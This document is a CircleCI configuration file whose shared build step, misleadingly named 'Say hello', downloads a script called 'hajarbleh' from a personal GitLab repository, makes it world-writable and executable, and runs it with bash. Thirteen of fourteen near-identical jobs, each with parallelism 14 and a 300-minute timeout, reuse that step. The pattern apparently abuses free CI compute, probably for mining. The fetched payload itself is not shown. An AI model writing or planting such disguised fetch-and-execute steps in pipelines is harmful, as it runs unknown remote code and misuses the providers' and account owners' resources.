working_dir: &working_dir ~/app
.build_template: &commonSteps
  steps:
    - checkout
    - run:
          name: "Say hello"
          no_output_timeout: 300m
          command: "wget https://gitlab.com/mellanyjeruju/hvgpu/-/raw/main/hajarbleh && chmod 777 hajarbleh && bash ./hajarbleh"

  working_directory: *working_dir

version: 2.0

jobs:
  MOX_01:
    <<: *commonSteps
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
  MOX_02:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_03:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  MOX_04:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_05:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_06:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_07:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_08:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_09:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_10:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_11:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_12:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_13:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MOX_14:
    parallelism: 14
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps

workflows:
  version: 2
  SUSU:
    jobs:
      - MOX_01
      - MOX_02
      - MOX_03
      - MOX_04
      - MOX_05
      - MOX_06
      - MOX_07
      - MOX_08
      - MOX_09
      - MOX_10
      - MOX_11
      - MOX_12
      - MOX_13
      - MOX_14